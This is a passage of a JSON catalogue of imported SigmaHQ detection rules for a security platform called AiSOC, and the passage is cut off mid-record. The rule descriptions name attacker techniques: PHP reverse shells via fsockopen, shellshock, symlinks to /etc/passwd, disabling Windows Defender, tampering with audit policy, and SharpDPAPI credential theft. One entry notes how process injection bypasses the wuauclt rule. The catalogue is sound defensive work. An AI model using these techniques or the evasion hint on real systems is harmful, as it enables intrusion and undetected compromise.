"id": "sigmahq-sigma-c649a6c7-cd8c-4a78-9c04-000fc76df954", "type": "detection", "name": "Potentially Suspicious Wuauclt Network Connection", "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-wuauclt-network-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c649a6c7-cd8c-4a78-9c04-000fc76df954", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml" } }, { "id": "sigmahq-sigma-c64c5175-5189-431b-a55e-6d9882158251", "type": "detection", "name": "Telegram Bot API Request", "description": "Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1102.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/telegram-bot-api-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c64c5175-5189-431b-a55e-6d9882158251", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/dns/net_dns_susp_telegram_api.yml" } }, { "id": "sigmahq-sigma-c6714a24-d7d5-4283-a36b-3ffd091d5f7e", "type": "detection", "name": "Potential PHP Reverse Shell", "description": "Detects usage of the PHP CLI with the \"-r\" flag which allows it to run inline PHP code. The rule looks for calls to the \"fsockopen\" function which allows the creation of sockets.\nAttackers often leverage this in combination with functions such as \"exec\" or \"fopen\" to initiate a reverse shell connection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-php-reverse-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c6714a24-d7d5-4283-a36b-3ffd091d5f7e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_php_reverse_shell.yml" } }, { "id": "sigmahq-sigma-c67e0c98-4d39-46ee-8f6b-437ebf6b950e", "type": "detection", "name": "Shellshock Expression", "description": "Detects shellshock expressions in log files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shellshock-expression.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c67e0c98-4d39-46ee-8f6b-437ebf6b950e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_shellshock.yml" } }, { "id": "sigmahq-sigma-c67fc22a-0be5-4b4f-aad5-2b32c4b69523", "type": "detection", "name": "Symlink Etc Passwd", "description": "Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/symlink-etc-passwd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c67fc22a-0be5-4b4f-aad5-2b32c4b69523", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_symlink_etc_passwd.yml" } }, { "id": "sigmahq-sigma-c6c56ada-612b-42d1-9a29-adad3c5c2c1e", "type": "detection", "name": "Audit Policy Tampering Via NT Resource Kit Auditpol", "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/audit-policy-tampering-via-nt-resource-kit-auditpol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml" } }, { "id": "sigmahq-sigma-c6fb44c6-71f5-49e6-9462-1425d328aee3", "type": "detection", "name": "Powershell Base64 Encoded MpPreference Cmdlet", "description": "Detects base64 encoded \"MpPreference\" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-base64-encoded-mppreference-cmdlet.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c6fb44c6-71f5-49e6-9462-1425d328aee3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_base64_mppreference.yml" } }, { "id": "sigmahq-sigma-c70e019b-1479-4b65-b0cc-cd0c6093a599", "type": "detection", "name": "PowerShell Called from an Executable Version Mismatch", "description": "Detects PowerShell called from an executable by the version mismatch method", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-called-from-an-executable-version-mismatch.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml" } }, { "id": "sigmahq-sigma-c72aca44-8d52-45ad-8f81-f96c4d3c755e", "type": "detection", "name": "Invoke-Obfuscation Via Stdin - PowerShell Module", "description": "Detects Obfuscated Powershell via Stdin in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-stdin-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml" } }, { "id": "sigmahq-sigma-c73124a7-3e89-44a3-bdc1-25fe4df754b1", "type": "detection", "name": "Copy From VolumeShadowCopy Via Cmd.EXE", "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/copy-from-volumeshadowcopy-via-cmd-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_shadowcopy_access.yml" } }, { "id": "sigmahq-sigma-c740d4cf-a1e9-41de-bb16-8a46a4f57918", "type": "detection", "name": "Potential Suspicious Windows Feature Enabled - ProcCreation", "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-suspicious-windows-feature-enabled-proccreation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c740d4cf-a1e9-41de-bb16-8a46a4f57918", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml" } }, { "id": "sigmahq-sigma-c74c0390-3e20-41fd-a69a-128f0275a5ea", "type": "detection", "name": "Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths", "description": "Detects the execution of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract \".cab\" files using the \"/extract\" argument from potentially suspicious paths.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cab-file-extraction-via-wusa-exe-from-potentially-suspicious-paths.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" } }, { "id": "sigmahq-sigma-c74d7efc-8826-45d9-b8bb-f04fac9e4eff", "type": "detection", "name": "Run Once Task Configuration in Registry", "description": "Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/run-once-task-configuration-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_runonce_persistence.yml" } }, { "id": "sigmahq-sigma-c7746f1c-47d3-43d6-8c45-cd1e54b6b0a2", "type": "detection", "name": "Kernel Memory Dump Via LiveKD", "description": "Detects execution of LiveKD with the \"-m\" flag to potentially dump the kernel memory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kernel-memory-dump-via-livekd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c7746f1c-47d3-43d6-8c45-cd1e54b6b0a2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml" } }, { "id": "sigmahq-sigma-c7942406-33dd-4377-a564-0f62db0593a3", "type": "detection", "name": "Suspicious CodePage Switch Via CHCP", "description": "Detects a code page switch in command line or batch scripts to a rare language", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-codepage-switch-via-chcp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c7942406-33dd-4377-a564-0f62db0593a3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_chcp_codepage_switch.yml" } }, { "id": "sigmahq-sigma-c79da740-5030-45ec-a2e0-479e824a562c", "type": "detection", "name": "System Disk And Volume Reconnaissance Via Wmic.EXE", "description": "An adversary might use WMI to discover information about the system, such as the volume name, size,\nfree space, and other disk information. This can be done using the 'wmic' command-line utility and has been\nobserved being used by threat actors such as Volt Typhoon.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-disk-and-volume-reconnaissance-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c79da740-5030-45ec-a2e0-479e824a562c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_recon_volume.yml" } }, { "id": "sigmahq-sigma-c7a74c80-ba5a-486e-9974-ab9e682bc5e4", "type": "detection", "name": "File With Uncommon Extension Created By An Office Application", "description": "Detects the creation of files with an executable or script extension by an Office application.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-with-uncommon-extension-created-by-an-office-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_susp_file_extension.yml" } }, { "id": "sigmahq-sigma-c7c8aa1c-5aff-408e-828b-998e3620b341", "type": "detection", "name": "MSI Installation From Suspicious Locations", "description": "Detects MSI package installation from suspicious locations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/msi-installation-from-suspicious-locations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c7c8aa1c-5aff-408e-828b-998e3620b341", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/msiinstaller/win_msi_install_from_susp_locations.yml" } }, { "id": "sigmahq-sigma-c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", "type": "detection", "name": "Failed MSExchange Transport Agent Installation", "description": "Detects a failed installation of a Exchange Transport Agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/failed-msexchange-transport-agent-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml" } }, { "id": "sigmahq-sigma-c7d33b50-f690-4b51-8cfb-0fb912a31e57", "type": "detection", "name": "HackTool - SharpDPAPI Execution", "description": "Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata.\nSharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1134.001", "T1134.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sharpdpapi-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c7d33b50-f690-4b51-8cfb-0fb912a31e57", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sharp_dpapi_execution.yml" } }, { "id": "sigmahq-sigma-c7da8edc-49ae-45a2-9e61-9fd860e4e73d", "type": "detection", "name": "PUA - Sysinternals Tools Execution - Registry", "description": "Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the \"accepteula\" registry key.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1588.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-sysinternals-tools-execution-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula.yml" } }, { "id": "sigmahq-sigma-c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", "type": "detection", "name": "Disable Administrative Share Creation at Startup", "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-administrative-share-creation-at-startup.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml" } }, { "id": "sigmahq-sigma-c7e91a02-d771-4a6d-a700-42587e0b1095", "type": "detection", "name": "Network Connection Initiated By Regsvr32.EXE", "description": "Detects a network connection initiated by \"Regsvr32.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1559.001", "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-connection-initiated-by-regsvr32-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c7e91a02-d771-4a6d-a700-42587e0b1095", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml" } }, { "id": "sigmahq-sigma-c803b2ce-c4a2-4836-beae-b112010390b1", "type": "detection", "name": "New Network Route Added", "description": "Detects the addition of a new network route to a route table in AWS.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-network-route-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c803b2ce-c4a2-4836-beae-b112010390b1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_new_route_added.yml" } }, { "id": "sigmahq-sigma-c80e66d8-1780-48a9-b412-46663fd21ac0", "type": "detection", "name": "Suspicious Autorun Registry Modified via WMI", "description": "Detects suspicious activity where the WMIC process is used to create an autorun registry entry via reg.exe, which is often indicative of persistence mechanisms employed by malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.001", "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-autorun-registry-modified-via-wmi.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c80e66d8-1780-48a9-b412-46663fd21ac0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_autorun_registry_modified_via_wmic.yml" } }, { "id": "sigmahq-sigma-c830f15d-6f6e-430f-8074-6f73d6807841", "type": "detection", "name": "Logging Configuration Changes on Linux Host", "description": "Detect changes of syslog daemons configuration files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/logging-configuration-changes-on-linux-host.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c830f15d-6f6e-430f-8074-6f73d6807841", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/path/lnx_auditd_logging_config_change.yml" } }, { "id": "sigmahq-sigma-c83bf4b5-cdf0-437c-90fa-43d734f7c476", "type": "detection", "name": "Run PowerShell Script from Redirected Input Stream", "description": "Detects PowerShell script execution via input stream redirect", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/run-powershell-script-from-redirected-input-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml" } }, { "id": "sigmahq-sigma-c8557060-9221-4448-8794-96320e6f3e74", "type": "detection", "name": "Windows PowerShell User Agent", "description": "Detects Windows PowerShell Web Access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-powershell-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c8557060-9221-4448-8794-96320e6f3e74", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_ua_powershell.yml" } }, { "id": "sigmahq-sigma-c86133ad-4725-4bd0-8170-210788e0a7ba", "type": "detection", "name": "Net WebClient Casing Anomalies", "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/net-webclient-casing-anomalies.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c86133ad-4725-4bd0-8170-210788e0a7ba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_webclient_casing.yml" } }, { "id": "sigmahq-sigma-c86500e9-a645-4680-98d7-f882c70c1ea3", "type": "detection", "name": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aadinternals-powershell-cmdlets-execution-proccesscreation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c86500e9-a645-4680-98d7-f882c70c1ea3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" } }, { "id": "sigmahq-sigma-c8a180d6-47a3-4345-a609-53f9c3d834fc", "type": "detection", "name": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet", "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 